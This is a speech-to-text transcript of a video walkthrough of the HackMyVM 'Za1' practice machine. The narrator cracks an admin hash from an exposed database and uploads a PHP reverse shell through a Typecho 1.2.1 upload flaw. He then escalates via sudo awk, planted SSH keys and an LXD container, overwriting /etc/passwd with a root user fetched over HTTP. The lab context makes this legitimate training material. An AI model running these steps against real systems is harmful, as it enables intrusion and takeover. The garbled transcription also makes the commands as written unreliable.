Yo, what's going on, guys? In this video, we're going to be doing Za1 from HackMyVm. This box for about solid easy. And yeah, let's get on to the video. So as always, I'm going to start by splitting my terminals here. I'm starting a net cover my SR 10.0.0.1/24/IT0. I'm also going to grab out for PCS. Doing this, we do get that IP of the box 10.0.2.16, so do Control-Shift-Z to bring map scan. So do MMISSC for default scripts, my SVM ratios, scan on ports in the IP. Doing this, I'll do minus verbals. Looking at the ports, port 80 open for HTTP and also port 22 open for SSH. Some start visiting port 80. Looking at this, we do get we do need a host name since this is not rendered. I'm going to control resource code to find the host name. We do have this for Za1.hmv, so I'm just going to VI into my /ED host. So we did have the IP address as 10.0.0.2.16 for Za1. I believe it was the HackMyVm, right? HMV. What's almost right? Account my /ED host. And now we do have the hosting for Za1 HMV. Doing this, we do have the page rendered now, right? So doing this, we do have this in Chinese here. I can't read this. I'm going to control the source code. Start doing some more enumeration. We can start running a GoBuster. We do have a typeecho.org. So what I'm going to do is go to typeecho.org. Sometimes I like going to like the documentation. I believe this is going to be they do have a GitHub here. So if I go to GitHub, we'll see what this is. We do have a PHP blogging platform, simple and powerful. So we do know this is a PHP blogging platform, right? So maybe we can start by searching for a version for that. Doing this, I'm going to start by running a GoBuster. So we're doing some more enumeration. So we'll do GoBuster mode minus into the IP address. We'll do minus W for user share word list or buster directory list, everything medium.txt. We'll do catches as HTML, TXT, and also PHP. Doing this, we do have a /admin here. So I'm going to go to /admin. Try for like admin. And doesn't seem to work, right? We have a /install.php. SQL, I'm going to go to /SQL. We have a new SQL and also a secret.SQL. So I'm just going to copy link location, see what this is, or just let that running. I'm going to do mkdir for SQL, cd into SQL, put these files in under here. Also did have this for secret.SQL or circuit.SQL. Doing this, I'm going to run a file command against these files. So I do a file for new.SQL. We do have this for SQLite, or SQLite for 3.x database. So this is a database file. So I'm just going to do SQLite. We'll do this for new.SQL. I believe if you do like a help command, you can see all the I believe you do have like a .tables. If I do .tables, you'll see that I do have all the tables within the database, right? So I do list out the databases or database. You'll see that this new.SQL, which I do have on my machine, is the database, right? So now we do have the type echo users, which we did see for what it was running for. I believe it was type echo, right? So we do have that for type echo. Just do select star from type echo users. Doing this, we do have two users as Zach Arcs and also for admin. So I'm going to try this for admin. First, I'm going to put this into like a hash.txt. I'll just do like a exit.exit. We'll be into hash.txt. We'll put this for admin. This for admin since I do want the top administrative user, right? So I'm using John to crack this. I'll do John minus word list. I'll do this for user share word list rocky.txt. Specify the hash.txt. This seemed like this is cracked, so I'll do John minus show for hash.txt. We do have one password for admin for the user, or for the password 123456. So see if this is valid. If I can go to admin for 123456, we do have a login successful, right? So doing this, we do have this in Chinese, but we do have a version here as type echo 1.2.1. I believe this is with Nmap as well. We did have this for the HTTP generator for type echo 1.2.1 running on port 80 for Apache. So look at this. Let's see if we can actually find like an exploit for. I'll just copy this since that is in Chinese. We'll do like an exploit for type echo. 1.2.1. So we do have a file upload vulnerability for the version. We have some resources here, which I'm going to check out. So here we do have a, I'll zoom in here. So we do have a GitHub here for a hyperlink. Just cancel that. Okay. We do have this type echo for version 1.2.1, but it does seem like this repository is not found. Let's check these other ones here. This is just for type echo. So anytime I do have like a repository found and I want like the actual like the source code for, or like how to really run, because usually by these GitHub repositories, you'll find like a step-by-step walkthrough on how to really exploit or get the file upload vulnerability, right? Let's go back into, I just want to read some more information about this. So doing this, it's saying that this is going to be a file upload vulnerability, allows a remote attacker to execute arbitrary code via the upload and options general parameters in index.php. So doing this, I just want a brief guide on how to do this. So I'm going to go to this page not found. I'm going to go to the Wayback Machine. This is going to be for an archive, so I can just put in the browse history. And this is going to give me an archive of when that GitHub repository was posted. And this should include all images and text within that cache, right? So scrolling down, I just want to look for anything that is in blue. So if I'm looking down, we do have a snapshot for August 9th, 2023. Put that new tab. And looking at this, we do have a type echo version 1.2.1 remote code execution. And here we do have all the images here, which makes it more easier for us to look. So doing this, we can just zoom in. Looking to this, you do see that he does go to the top here. So I'm just going to go to the top. He is enabling PHP dot. So let's see if we can find this. So we do have, I'm guessing it's going to be for this one. So do PHP dot. We can save that. It seemed like it was saved since it's green. We can visit the URL for HTTP for admin wirepost.php, which is based on the current directory where I've set up. So this is going to be for the top one. So we'll go here. I'm guessing this could be for write. He does submit a file. Looking here, he follows the request. He's uploading a file, which is going to be for just displaying the PHP info page. And from there, he displays it what's going into this requested URL for uploads 2023 under this PHP file, right? Which I'm guessing we can copy once it is posted. Let's start by doing that. So we do have this under here. We can upload a file, I believe. So I'm just going to go to PHP shell for GitHub. I'm just going to git clone the repository. So I actually have it within my directory, right? So git clone that. We'll go to PHP shell. And we should have the PHP shell.php right there, right? So I'm just going to vm into PHP shell.php. I do have my IP for 10.0.69. 10.0.069. Run some port 9001. Some right quit. And now we do have the PHP shell.php. So I'm just going to go back. We'll go to upload. I'm going to go to other locations for backup. We'll go to HackMyVm. We do have this for Za1. PHP shell.php. Go to PHP shell.php. Go to OK. And now we do have this for that location that we did see on the Wayback Machine. Going back over here. We did find the same 304. We have this for 181, right? So it does, or 180. So this does have a unique identifier. If we go press it on that, we do get a connection refused. So we can start our listener. My terminal's here. So I'll do all wrapped and HackMyVm VP on 8001. Refresh that. We do ID. And now under www data. So I'm starting up bin/bash -i. I'm going to export with my term. is equal to xterm. I do want to run some T2y, so do Python 3 minus C. We'll do this import for P2y, P2y.spawn. Run this /bin/bash. Press on that, we do ID. And now under no data. So I'm also running a sudo myself. Doing this, we do have this for user bin awk for Za1. So do sudo -u for the user for Za_1 for user bin awk. We can go to GTFO bins. So go to GTFO bins. We do have the binary for awk. So AWK. So you can just copy and paste that. So we have sudo -u for Za_1 for the user bin awk for the binary. Press enter on that. We do ID, and now under Za1. So I'll do bash -i, and now under Za1. So I'm sort of running a sudo myself. It doesn't seem like we do have the password for this. I'm going to be trying the same password that we did have for the type echo. So I'll do 1 2 3 4 5 6. And it doesn't seem like that is the password, right? So I'm sort of running well, let's actually go into the home directory to, we do have port 22 open for SSH. We do have a .sh. I'm seeing into .sh. We do have an authorized _keys under here, right? So I'll make a directory for cd back. I'll make a directory for, we'll just do SSH. So you need to do SSH. I'll do SSH keygen. Press there on that. We'll do yes. Copy from /root.sh. I'll do this ID_state to this directory and also the .pub. Got the ID_state.pub. Up in my text editor, so I'm just going to echo for that. I'm going to echo that authorized _keys. Copy that and put this into here. Now we do have this authorized _keys. Cat this out. You see that we do have that root at Kelly. So do chmod 600 for authorized _keys. Now we do have, if I do Ctrl+Shift-O, we do have that private key with the public key. So we'll do a cd into SSH. We'll do SSH into Za_1 at 10.0.0.2.16 -i for ID_SA. Doing this, we do ID, and now under Za1. Looking into the groups, we do have a LXD group here. So I'm going to go into, let's see if we can go to exploitdb for LXD. I do have this for 18.04 for LXD. I like going into just copying this because if you do try to get this 46978 or just trying to duplicate this file, you will get an error. So I like going to like dev.shm, putting into this like file.sh. Let me just move this into a better identifier for the file. I'll just name this for exploit.sh. We'll do chmod +x for exploit.sh. Now, if you run the exploit.sh, it should run with the -f option, right? For that tar.gc file. Going back over here, I do have a, if I go into my documents here, I do have this build Alpine. I believe it was, let's see what we do have. Let's see the documents. We do have this LXD Alpine builder. I already did have it built, so I do have this tar.gc file, which I do use for LXD. So do Python 3 -m http.server 881, so I can transfer this file to the machine. To be HTTP 10.0.0.69 on port 881 for this tar.gc file. So now we can do exploit.sh. We'll do -f for Alpine. So now this is going to create an Alpine container. So we do pwd, we can go into the Alpine layer, we can go back, cd into mount, c into root, and now we are under the real file system for root, right? This is just mounted, so we can go into like /etc. Got this password file. You'll see that I do have the password file that which is on the real machine, right, as well. Just to confirm, I can also go under this, let's see, into root. I do have that root.txt under here as well. So I'm going to go into /etc. I do want to put my own user under this password file. So I usually like copying this password file and putting it into my own directory and also overriding that password directory, right? Or that password file. So under here, I'm just going to be into password. So my terminal screen, I'll do mk password. We'll do the m for the method for SHA-512. We'll type in pass. HackMyVm anti-password file. I'm going to create a user for proxy programmer. Enter that hash. We'll do this for 0, 0, root, /root, /bin/bash. I got the password file. I do have that for proxy programmer. So I'm going to start a Python server under here so I can actually transfer that and override it to that password file. So do python 3 -m http.server port 8021. I already do have this running. So I do have some port 8021. So we should have wget on here, which you do have wget. So do wget http 10.0.070 or 10.069 or 8081. We have that password. We want to do -o so you can overwrite that password file. We cat our password file. Now we do have the user for proxy programmer. So you can exit out of this container. So if I try to cat my /d password, so I'm going to switch users to proxy programmer now. We do have the password for pass. So cd back, we do else my slay, cat root.txt. Well guys, if you enjoyed the video, don't forget to like and subscribe. And I'll catch you guys in the next one.